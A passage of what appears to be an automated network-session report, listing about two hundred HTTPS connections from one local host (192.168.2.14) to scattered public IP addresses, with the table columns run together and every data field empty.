                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13024192.168.2.1446460197.171.158.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13025192.168.2.1457694206.65.35.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13026192.168.2.1460968199.148.65.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13027192.168.2.145081820.227.164.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13028192.168.2.144552289.97.148.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13029192.168.2.1445106154.178.151.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13030192.168.2.1449516190.139.61.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13031192.168.2.145500860.217.165.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13032192.168.2.145629666.44.108.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13033192.168.2.1436932176.176.145.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13034192.168.2.145680872.99.207.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13035192.168.2.143597876.158.91.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13036192.168.2.1450022206.0.78.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13037192.168.2.143358445.156.224.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13038192.168.2.1447090198.67.176.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13039192.168.2.144477497.56.210.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13040192.168.2.1440000175.165.16.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13041192.168.2.145823012.45.243.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13042192.168.2.1456164165.46.1.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13043192.168.2.1446864183.195.113.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13044192.168.2.1456336187.46.188.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13045192.168.2.1453962171.201.250.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13046192.168.2.1434128162.250.99.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13047192.168.2.145185620.2.53.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13048192.168.2.1456562211.156.8.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13049192.168.2.1435430168.14.236.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13050192.168.2.1452718150.10.240.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13051192.168.2.1449464143.67.110.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13052192.168.2.1455568205.235.142.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13053192.168.2.144141650.201.118.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13054192.168.2.1436468173.243.189.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13055192.168.2.1437444150.152.131.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13056192.168.2.1455812131.211.247.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13057192.168.2.143372269.80.241.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13058192.168.2.1454262140.111.246.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13059192.168.2.1439348153.131.207.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13060192.168.2.1460682136.186.74.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13061192.168.2.145766048.37.122.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13062192.168.2.1435478203.2.156.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13063192.168.2.1456660202.222.206.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13064192.168.2.1456128119.148.55.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13065192.168.2.1450550137.112.62.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13066192.168.2.1447594103.45.142.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13067192.168.2.145564894.169.187.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13068192.168.2.1456308206.119.213.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13069192.168.2.1435462159.165.91.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13070192.168.2.145312681.165.178.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13071192.168.2.1456756222.94.94.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13072192.168.2.146018241.23.217.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13073192.168.2.1448274163.174.228.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13074192.168.2.14401304.21.65.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13075192.168.2.1434176192.167.171.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13076192.168.2.143352687.229.6.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13077192.168.2.146003492.72.39.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13078192.168.2.144813058.86.72.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13079192.168.2.1436602204.9.56.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13080192.168.2.1442006137.67.70.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13081192.168.2.1447554106.78.54.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13082192.168.2.1457390141.181.77.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13083192.168.2.1443580135.110.250.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13084192.168.2.1451132126.137.178.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13085192.168.2.1440732146.35.73.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13086192.168.2.1439474208.112.208.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13087192.168.2.14532042.198.30.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13088192.168.2.1435772208.142.158.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13089192.168.2.1450276198.191.42.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13090192.168.2.1451980212.53.9.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13091192.168.2.143373643.57.228.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13092192.168.2.143651653.45.31.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13093192.168.2.1451120153.81.236.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13094192.168.2.143446678.233.1.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13095192.168.2.14506469.230.0.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13096192.168.2.143795458.147.135.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13097192.168.2.1446006146.216.95.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13098192.168.2.143450693.145.193.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13099192.168.2.145351034.181.91.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13100192.168.2.144640219.125.68.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13101192.168.2.1454584106.15.210.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13102192.168.2.1446034177.92.172.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13103192.168.2.1447874160.98.76.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13104192.168.2.1456308126.236.111.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13105192.168.2.144448468.94.188.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13106192.168.2.145374899.166.142.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13107192.168.2.1451958204.167.51.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13108192.168.2.1439654107.77.164.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13109192.168.2.1435710189.78.18.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13110192.168.2.1448172171.110.166.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13111192.168.2.144058414.21.214.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13112192.168.2.1438826213.233.169.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13113192.168.2.144693888.149.93.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13114192.168.2.1452060115.77.10.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13115192.168.2.145400883.144.54.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13116192.168.2.1458084150.90.124.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13117192.168.2.1458202181.63.141.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13118192.168.2.145462014.72.81.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13119192.168.2.1438808101.132.165.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13120192.168.2.1434600153.241.16.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13121192.168.2.144770039.195.201.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13122192.168.2.1455142155.50.163.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13123192.168.2.1439698118.44.107.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13124192.168.2.1445516116.13.84.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13125192.168.2.14512024.138.63.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13126192.168.2.143732282.216.34.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13127192.168.2.1437056142.131.42.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13128192.168.2.1455186132.145.148.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13129192.168.2.1460264123.235.214.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13130192.168.2.144335870.134.96.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13131192.168.2.144600664.111.104.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13132192.168.2.1457056122.157.41.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13133192.168.2.1441566191.246.16.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13134192.168.2.1444154171.130.73.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13135192.168.2.1458010147.57.90.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13136192.168.2.145339090.34.156.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13137192.168.2.1446764152.62.197.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13138192.168.2.143306686.2.6.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13139192.168.2.144385825.140.6.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13140192.168.2.1442466208.197.127.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13141192.168.2.1447024146.95.66.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13142192.168.2.145727440.170.65.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13143192.168.2.144186854.245.235.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13144192.168.2.145983897.119.103.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13145192.168.2.143729251.77.112.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13146192.168.2.1458762173.138.221.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13147192.168.2.1455424184.127.226.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13148192.168.2.1436682223.189.228.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13149192.168.2.144753835.0.213.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13150192.168.2.1458532177.71.175.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13151192.168.2.144333487.229.232.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13152192.168.2.143910840.165.219.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13153192.168.2.145274640.159.210.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13154192.168.2.1457584166.51.226.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13155192.168.2.1435376218.210.51.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13156192.168.2.1435728200.45.227.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13157192.168.2.1447374146.210.207.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13158192.168.2.1434420130.26.12.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13159192.168.2.145232291.28.50.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13160192.168.2.145008087.192.62.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13161192.168.2.145329852.180.48.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13162192.168.2.144370469.22.159.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13163192.168.2.1437252147.100.169.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13164192.168.2.145009067.115.67.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13165192.168.2.1435424176.161.175.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13166192.168.2.145275652.239.6.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13167192.168.2.145311678.119.97.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13168192.168.2.1450244160.45.62.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13169192.168.2.1434022149.139.44.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13170192.168.2.1448644160.49.62.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13171192.168.2.1441304149.125.101.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13172192.168.2.144428486.171.161.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13173192.168.2.145137412.249.102.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13174192.168.2.1449566114.208.234.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13175192.168.2.1449592206.121.113.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13176192.168.2.145708096.100.180.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13177192.168.2.1456698156.193.181.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13178192.168.2.1450100202.81.231.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13179192.168.2.144723275.136.216.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13180192.168.2.14341329.236.38.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13181192.168.2.1433258185.217.72.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13182192.168.2.1435566200.127.68.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13183192.168.2.1456592174.199.114.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13184192.168.2.1455288124.198.223.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13185192.168.2.145793668.245.4.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13186192.168.2.145294423.22.40.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13187192.168.2.1456598179.230.206.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13188192.168.2.143999442.254.229.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13189192.168.2.1454424113.157.98.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13190192.168.2.145436098.176.218.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13191192.168.2.145807064.225.153.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13192192.168.2.1447946205.13.84.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13193192.168.2.1457362155.102.123.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13194192.168.2.145865472.142.224.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13195192.168.2.1440300166.77.225.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13196192.168.2.144361232.90.193.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13197192.168.2.145885472.253.131.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13198192.168.2.144062285.220.108.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13199192.168.2.143682436.34.129.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13200192.168.2.145915834.66.104.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13201192.168.2.1448562167.172.163.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13202192.168.2.1449222120.98.245.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13203192.168.2.144623613.56.127.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13204192.168.2.144806482.5.123.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13205192.168.2.1453092170.202.79.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13206192.168.2.144368843.63.253.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13207192.168.2.1457418174.23.89.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13208192.168.2.1454952221.65.102.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13209192.168.2.1458800111.22.194.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13210192.168.2.145044862.151.170.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13211192.168.2.144654842.166.249.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13212192.168.2.1458960175.166.207.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13213192.168.2.145659425.57.6.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13214192.168.2.145787291.234.104.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13215192.168.2.145528237.159.177.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13216192.168.2.143868020.58.208.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13217192.168.2.144784668.78.78.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13218192.168.2.1447812204.148.214.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13219192.168.2.144918843.56.253.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13220192.168.2.1458590102.61.179.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13221192.168.2.1438860187.247.173.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13222192.168.2.144543817.133.108.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13223192.168.2.1435024178.47.110.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13224192.168.2.144510824.20.94.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13225192.168.2.1455886124.236.62.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13226192.168.2.145260861.6.77.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13227192.168.2.1437614213.71.195.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13228192.168.2.144438837.67.187.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13229192.168.2.1458530190.35.186.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13230192.168.2.1452684120.177.157.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13231192.168.2.1457512206.157.155.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13232192.168.2.1440404170.11.190.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13233192.168.2.144922840.246.85.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13234192.168.2.1460868195.166.165.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13235192.168.2.145599453.84.122.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
